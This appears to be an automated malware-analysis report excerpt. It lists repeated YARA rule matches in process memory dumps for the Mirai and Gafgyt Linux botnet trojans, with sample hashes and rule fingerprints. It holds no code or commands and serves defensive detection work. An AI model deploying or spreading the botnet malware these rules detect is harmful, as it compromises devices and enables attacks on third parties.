Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6536.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6484.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6545.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6594.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6538.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6557.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6450.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6603.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6496.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
